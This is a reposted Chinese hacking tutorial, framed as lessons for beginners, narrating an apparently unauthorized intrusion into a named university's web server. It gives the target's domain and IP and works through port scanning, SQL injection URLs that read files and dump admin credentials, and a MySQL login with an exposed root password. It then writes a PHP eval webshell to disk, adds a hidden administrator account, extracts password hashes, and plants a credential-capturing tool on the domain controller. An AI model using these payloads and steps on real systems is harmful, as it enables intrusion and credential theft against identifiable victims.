作者：Msnh4ck（曉華）??版權所有：歲月聯盟 www.syue.com ? ???腳本***只是***測試中的其中一環，按技術難度劃分來說也是最初級的，當然這類***任務交由具有一定***經驗的Web***即可輕松完成，對于一些難度較高的目標，則需要***者必須擁有exploit的積累。一個安全測試團隊，當然也會形成非常專業的文檔，流程，以及強大的工具。團隊內部也必須有專職的***技術研究人員或者組織，建立******實驗室，推演最新******技術，最終將知識在內部進行共享以及轉化。 當然以上都是一些專業的安全***團隊能夠做到的，對于普通的***迷來說，是很難進入這類團隊的，畢竟不是人人都能參與安全服務行業，多數人都是業余愛好而已，業余人員學習的最大意義在于學習最新***技術來武裝自己不被***。技術學習都是從低到高而進行的，下面以實例的形式來講解如何進行腳本***。本次***主要涉及如下知識： ?? 主機端口掃描 ?? Web/MYSQL*** ?? WindowS主機提權 ?? 域環境的*** 下面將嚴格按照以上步驟實施本次***任務，同時向新手朋友體現普通******的基本步驟以及一些經典***測試工具的應用。本次******的目標是國內某著名大學，看域名應該知道是誰。其地址如下： www.mse.tsinghua.edu.cn 主機端口掃描 ? ???很多***技術迷對于端口掃描很不在乎，原因是從主機直接下手的機會相對比較渺茫，但是這樣的想法是不夠嚴謹的，筆者不是在否定它的正確性。作為一次安全***，主機端口掃描是非常重要的，同時也是必須做的，端口掃描的內容也會詳細寫入文檔，提供給客戶。對于***人員來說不僅全面了解目標服務器的安全狀況，更重要的是得到了一些基礎情報，這些情報會決定你的整個***走向。對于端口掃描工具的選用，可以應用NmaP這類王牌掃描器。其實NMAP的功能非常強大的，不僅體現在端口掃描上，新版本中增加了一些功能強悍的插件，這類插件對于******是非常有幫助的，具體可以自己查看。目前NMAP的最新版本是5.0，讀者朋友可以自行下載安裝。下面應用掃描器對目標系統進行掃描測試，可以執行如下命令： Nmap -v -A www.mse.tsinghua.edu.cn 通過掃描器返回的數據，得到如下一些重要信息。如圖1所示 下載 (128.8 KB) 2009-10-24 03:34 以上只是一些基本的端口開放情況，通過掃描我們還可以得到目標服務器運行的詳細軟件版本。如圖2所示 下載 (108.07 KB) 2009-10-24 03:34 從以上掃描的結果來看，這臺服務器并不安全，因為有過多的敏感端口暴露在外部，這樣是極易受到***的?，F在需要將掃描結果進行整理，整理范圍是敏感端口。筆者整理的結果如下： ??21/tcp? ???ftp? ?? ?? ?? ?Serv-U ftpd 6.4 ??53/tcp? ???domain? ?? ???Microsoft DNS ??80/tcp? ???http? ?? ?? ???Apache httpd 2.0.53 ??3306/tcp? ?mysql? ?? ?? ? MySQL 4.1.9-nt ??3389/tcp? ?microsoft-rdp??Microsoft Terminal Service ??8080/tcp? ?Apache Tomcat/Coyote JSP engine 1.0 ??Running:? ?Microsoft Windows 2003 以上各個端口如何進行***，相信大家都很精通，畢竟大家都是首先學習系統漏洞***的。另外筆者給新手朋友推薦一款非常不錯的漏洞掃描器，那就是大名鼎鼎的Nessus，最新版本為3.X。筆者使用Nessus對以上端口的漏洞掃描，均沒有任何進展，下邊就不得不考慮使用腳本***技術了?，F在我們首先要弄明白如何進行下面的腳本***，通過掃描知道目標服務器應用的是Apache httpd 2.0.53以及Apache Tomcat/Coyote JSP engine 1.0，數據庫是MySQL 4.1.9-nt。這樣可以推測目標服務器所使用的程序應該是php以及JSP二種類型，對于這類程序最好的***就是注入漏洞，另外MYSQL對***也有幫助，在后邊你將看到他的用武之地。 ?? ?Web/MYSQL*** 從系統漏洞***失利后，必須轉戰作戰目標。通常WEB系統是最脆弱的一環，在進行Web***之前需要簡單搜集一些信息。比如服務器做綁定的域名數量，以及應用的何種Web程序以及數據庫系統，如果要進行社工***的話，還需要收集管理員的基本信息，比如聯系的QQ，EMAIL，手機等。下面對服務器域名綁定情況作一下簡單判斷。如圖3所示 下載 (94.2 KB) 2009-10-24 03:34 該服務器運行著多個網站，這樣有利于主站***失利后的旁注***。通過瀏覽器打開主站，主站應用的是PHP程序，后臺數據庫已經通過掃描得到了。如圖4所示 下載 (184.54 KB) 2009-10-24 03:34 現在我們可以對這個主站展開攻勢了，首先是測試常規腳本漏洞，如何查找注入漏洞，這里就不廢話了，大家都是專家水平了。這里給新手普及一款腳本漏洞掃描利器—【jsky】 這款工具是ZWELL寫的，效果還是非常不錯的。直接運行【jsky】主程序，點擊【FILE】菜單，選擇【NEW SCAN】選項。出現如下對話框，如圖5所示 下載 (51.61 KB) 2009-10-24 03:34 在上面的【URL】中輸入要檢測的目標站點地址，如圖6所示 下載 (41.57 KB) 2009-10-24 03:34 點擊【NeXT】進入下一步的設置，這里可以根據自己需要進行設置，筆者這里保持默認即可。如圖7所示 下載 (61.41 KB) 2009-10-24 03:34 繼續選擇【NEXT】 最后點擊【Finish】完成設置 如圖8所示 下載 (57.24 KB) 2009-10-24 03:34 執行【SCAN】進行漏洞掃描，很快就發現了多處注入漏洞。如圖9所示 下載 (137.09 KB) 2009-10-24 03:35 筆者從中挑選了一個注入點進行諸如測試，其頁面如下： http://www.mse.tsinghua.edu.cn:80/mse/news/detail.php?ID=172 首先進行字段判斷，具體判斷過程就不說了。筆者得到當前具有5個字段。如圖10所示 下載 (95.97 KB) 2009-10-24 03:35 執行如下語句得到可被用來顯示數據的字段，語句如下: http://www.mse.tsinghua.edu.cn/mse/news/detail.php?ID=-172??union select 1,2,3,4,5 如圖11所示 下載 (77.88 KB) 2009-10-24 03:38 通過上圖得知，已經獲得多個可被顯示的字段?，F在來看一下數據庫的詳細信息，主要是判斷當前連接的賬戶。執行如下語句： http://www.mse.tsinghua.edu.cn/mse/news/detail.php?ID=-172??union select 1,user(),3,4,5/* 結果出現下列錯誤信息，應該是字符集設置的問題，如圖12所示 下載 (65.12 KB) 2009-10-24 03:38 Version()內置函數也無法顯示，對于連接用戶權限的判斷十分重要，若是ROOT用戶，則可以直接讀取文件了。下面我們來嘗試讀取c:\boot.ini文件。執行如下語句： http://www.mse.tsinghua.edu.cn/mse/news/detail.php?ID=-172??union select 1,load_file(char(99,58,92,98,111,111,116,46,105,110,105)),3,4,5/* 結果發現能夠讀取，那么可以判斷當前連接用戶是ROOT權限了。如圖13所示 下載 (146.12 KB) 2009-10-24 03:38 現在來確定下接下來的***思路： ●讀取APACHE配置文件，可得網站絕對路徑 ●讀取APACHE_TOMCAT配置文件，得JSP站點絕對路徑以及管理密碼 ●將一句話***導出到JSP站目錄下 ●讀取JSP或者PHP站點數據庫連接文件，得ROOT密碼。 ●讀取SERV_U得到網站路徑，以及加密的賬戶。 ●注入后臺數據庫，得到管理密碼進后臺。 通過測試發現這些軟件都不是默認安裝的，無法進行讀取，管理應該是存放在一個特定的目錄中，這樣很難猜解。在正面戰場（主站）也沒有通過提交單引號來得到路徑，總之測試了爆路徑的所有方法都無功而返。這樣我們只能猜解后臺管理表和字段來爆后臺密碼了，由于數據庫版本是MYSQL 4.1.9-nt，這樣注入受到很大的限制，如果字段不是常見的，是很難進行猜解的。下面就開始猜解后臺管理表，猜解過程大家都會，成功的幾率就看平時的猜解經驗以及字典豐富程度了。筆者發現login表是后臺的管理表，猜解語句如下： http://www.mse.tsinghua.edu.cn/mse/news/detail.php?ID=172 union select 1,2,3,4,5 from login/* 表有了，還需要字段。通過猜解發現字段是常規的username以及password,猜解語句如下： http://www.mse.tsinghua.edu.cn/mse/news/detail.php?ID=172??union select 1,concat(username,0x3a,password),3,4,5 from login/* 下面爆出后臺管理密碼，語句如下： http://www.mse.tsinghua.edu.cn/mse/news/detail.php?ID=-172 union select 1,concat(username,0x3a,password),3,4,5 from login/* 如圖14所示 下載 (110.08 KB) 2009-10-24 03:39 密碼有了，后臺也是常規的頁面，很容易查找。如圖15所示 下載 (53.01 KB) 2009-10-24 03:39 利用得到的密碼順利登陸，這里就要進入奪取Webshell的環節了。后臺是非常的簡單，馬上找到圖片上傳的頁面上傳PHP***。如圖16所示 下載 (64.28 KB) 2009-10-24 03:39 提交后發現無法進行上傳，通過給PHP***頭部添加gif89a頁無濟于事，經過多種方式進行突破都無法上傳。最后上傳了一個真實的圖片文件，結果還是沒有上傳成功，通過返回的錯誤信息我們得到了網站的絕對路徑。如圖17所示 下載 (64.24 KB) 2009-10-24 03:39 連正常的圖片文件都無法上傳，那么PHP腳本也肯定不能了，后臺奪取Webshell的路也走到盡頭了?，F在有了路徑，可以嘗試讀取網站數據庫連接文件。為了方便，筆者直接使用工具了。成功得到ROOT密碼，如圖18所示 下載 (44.87 KB) 2009-10-24 03:39 現在我們登錄遠程MYSQL數據庫準備寫入一句話***，執行如下命令進行連接： mysql -h166.111.38.19 -uroot -ppassFORroot 成功登陸，如圖19所示 下載 (50.84 KB) 2009-10-24 03:39 下面開始導出一句話***到Web目錄下，執行如下SQL語句。 use mysql; Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('<?php eval($_POST[cmd]);?>'); select cmd from a into outfile 'E:/webpage/mse/mse/news/xh.php'; Drop TABLE IF EXISTS a; 以上語句執行的很順利，如圖20所示 下載 (44.35 KB) 2009-10-24 03:39 一句話***是導出成功的，其完整地址如下： http://www.mse.tsinghua.edu.cn/mse/news/xh.php 使用一句話***客戶端進行連接，如圖21所示 下載 (55.27 KB) 2009-10-24 03:39 通過一句話***，筆者上傳了一個大馬以方便操作，下面部分就是提權操作了。 ? WindowS主機提權 由于當前使用的是APACHE服務器，默認是以系統權限啟動的，這里我們可以執行任意系統命令。首先查看當前權限，可以使用whoami命令。如圖22所示 下載 (31.61 KB) 2009-10-24 03:39 看來管理員并沒有對APACHE進行降權，下面直接使用NET命令添加賬戶。如圖23所示 下載 (31.44 KB) 2009-10-24 03:39 發現并沒有添加成功，根據平時經驗來看，估計是服務器做了密碼安全策略，驗證了密碼長度。下面使用一個足夠復雜的密碼，添加命令如下： Net user msnh4ck 123456qwert!@# /add Net localgroup administrators msnh4ck /add 執行以上命令，通過返回的結果來看是成功的。如圖24 下載 (31.45 KB) 2009-10-24 03:39 利用添加的用戶，成功登陸遠程桌面。如圖25 下載 (29.85 KB) 2009-10-24 03:39 域環境的*** 登陸的時候發現當前這臺主機是域服務器，關于域環境的***，《***手冊》有多篇文章可供參考了，不熟悉的朋友可以回頭復習下。筆者通過大馬上傳了一個hash提取工具gethashes.exe，提取了其他賬戶的hash值。如圖26所示 下載 (64.87 KB) 2009-10-24 03:39 筆者沒有下載120G的彩虹表，于是就用前段時間下的7G表進行破解。破解效果很不如意，只破解出了guest賬戶的密碼。如圖27所示 下載 (40.26 KB) 2009-10-24 03:39 通過這個賬戶登錄進去，在其目錄下還發現了一些***工具?？磥硪呀浻腥私葑阆鹊橇?。由于當前主機就是域服務器，筆者就給服務器安裝了一個終端密碼截獲工具【winlogohack】，這里主要有二個考慮，第一是記錄域管理員的密碼，第二是非常邪惡的，如果前邊這個***在這個內網中有收獲，筆者可以坐收漁翁之利。幾天之后筆者順利截獲到了域管理員的密碼，如圖28所示 下載 (49.06 KB) 2009-10-24 03:39 有了域管理員的密碼就可以在這個域中任意擺布了。 總結：本節內容詳細講解了一次典型的******任務，希望這篇文章能夠幫助到新手朋友。對于本文有任何的疑問以及意見，請在《歲月聯盟》找我交換意見，謝謝

轉載于:https://blog.51cto.com/zhuxihua/303312

與50位技術專家面對面20年技術見證，附贈技術全景圖

總結

以上是生活随笔為你收集整理的***脚本***普及的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。